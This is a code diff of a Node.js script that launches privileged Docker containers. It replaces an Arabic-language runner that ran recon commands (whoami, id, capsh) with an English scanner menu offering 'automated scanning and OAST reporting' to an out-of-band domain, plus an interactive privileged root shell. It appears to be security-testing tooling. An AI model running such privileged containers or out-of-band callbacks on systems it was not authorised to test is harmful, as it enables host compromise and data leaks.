-  // التعامل مع إشارات الإغلاق
+  // التعامل مع Ctrl+C
   process.on('SIGINT', () => {
-    console.log('\n\n⚠️  تم استقبال Ctrl+C...');
+    console.log('\n\n⚠️  Received Ctrl+C, cleaning up...');
     dockerProcess.kill('SIGINT');
   });
 }
 
-// ===================== النسخة مع أوامر مسبقة =====================
-function runWithPredefinedCommands() {
-  console.log('🚀 تشغيل حاوية مع أوامر مسبقة...\n');
-  
-  const commands = [
-    'echo "=== مرحباً من الحاوية المميزة ==="',
-    'cat /etc/os-release | grep PRETTY_NAME',
-    'uname -a',
-    'whoami',
-    'id',
-    'echo "=== الصلاحيات ==="',
-    'capsh --print 2>/dev/null | head -5 || echo "capsh غير متاح"',
-    'echo "=== انتهى ==="',
-    'exit 0'
-  ];
-  
-  const dockerProcess = spawn('docker', [
-    'run', '--privileged', '--rm', 'ubuntu:latest', 'sh', '-c', commands.join(' && ')
-  ]);
-  
-  dockerProcess.stdout.on('data', (data) => {
-    console.log(data.toString());
-  });
-  
-  dockerProcess.stderr.on('data', (data) => {
-    console.error(data.toString());
-  });
-  
-  dockerProcess.on('close', (code) => {
-    console.log(`\n✅ انتهى مع الكود: ${code}`);
-  });
-}
-
-// ===================== الوظيفة الرئيسية =====================
+// ===================== MAIN FUNCTION =====================
 async function main() {
-  console.log(`
-╔══════════════════════════════════════════════════════════╗
-║      تشغيل حاوية Docker مميزة                           ║
-║      Privileged Container Runner                         ║
-╚══════════════════════════════════════════════════════════╝
-  `);
-  
-  console.log('📋 اختر طريقة التشغيل:');
-  console.log('   1. تشغيل تفاعلي بسيط (docker run --privileged -it ubuntu:latest /bin/bash)');
-  console.log('   2. تشغيل مع أوامر مسبقة وعرض الناتج');
-  console.log('   3. تشغيل متقدم مع تقرير كامل');
-  console.log('   4. خروج');
+  console.log('🎯 Choose scanning method:');
+  console.log('   1. Full analysis with automated scanning and OAST reporting');
+  console.log('   2. Simple container with basic OAST reporting');
+  console.log('   3. Interactive privileged container (docker run --privileged -it ubuntu:latest /bin/bash)');
+  console.log('   4. Exit');
   
   const readline = require('readline').createInterface({
     input: process.stdin,
     output: process.stdout
   });
   
-  readline.question('\nاختر رقم: ', async (choice) => {
+  readline.question('\nSelect option: ', async (choice) => {
+    readline.close();
+    
     switch(choice.trim()) {
       case '1':
-        readline.close();
-        runSimplePrivilegedContainer();
+        const scanner = new PrivilegedContainerScanner();
+        await scanner.run();
         break;
         
       case '2':
-        readline.close();
-        runWithPredefinedCommands();
+        runSimplePrivilegedWithOAST();
         break;
         
       case '3':
-        readline.close();
-        const runner = new PrivilegedContainerRunner();
-        await runner.run();
+        runInteractivePrivileged();
         break;
         
       default:
-        readline.close();
-        console.log('👋 تم الخروج');
-        break;
+        console.log('👋 Exiting');
+        process.exit(0);
     }
   });
 }
 
-// ===================== تشغيل مباشر من السطر =====================
+// ===================== CHECK DOCKER =====================
 if (require.main === module) {
-  // التحقق من تثبيت Docker
+  // التحقق من Docker
   exec('which docker', (error) => {
     if (error) {
-      console.error('❌ Docker غير مثبت أو غير موجود في PATH');
-      console.log('   يرجى تثبيت Docker أولاً:');
-      console.log('   https://docs.docker.com/get-docker/');
+      console.error('❌ Docker is not installed or not in PATH');
       process.exit(1);
     }
     
-    // التحقق من الصلاحيات
     exec('docker ps', (error) => {
       if (error && error.message.includes('permission denied')) {
-        console.error('❌ ليس لديك صلاحيات تشغيل Docker');
-        console.log('   حاول مع sudo أو أضف مستخدمك لمجموعة docker:');
-        console.log('   sudo usermod -aG docker $USER');
-        console.log('   ثم سجل الخروج وأدخل مرة أخرى');
+        console.error('❌ Permission denied for Docker');
+        console.log('   Try: sudo usermod -aG docker $USER');
+        console.log('   Then logout and login again');
         process.exit(1);
       }
       
+      console.log(`✅ Docker is available`);
+      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+      
       // بدء البرنامج
       main();
     });
   });
 }
 
-module.exports = { PrivilegedContainerRunner, runSimplePrivilegedContainer };
+module.exports = { PrivilegedContainerScanner, CONFIG };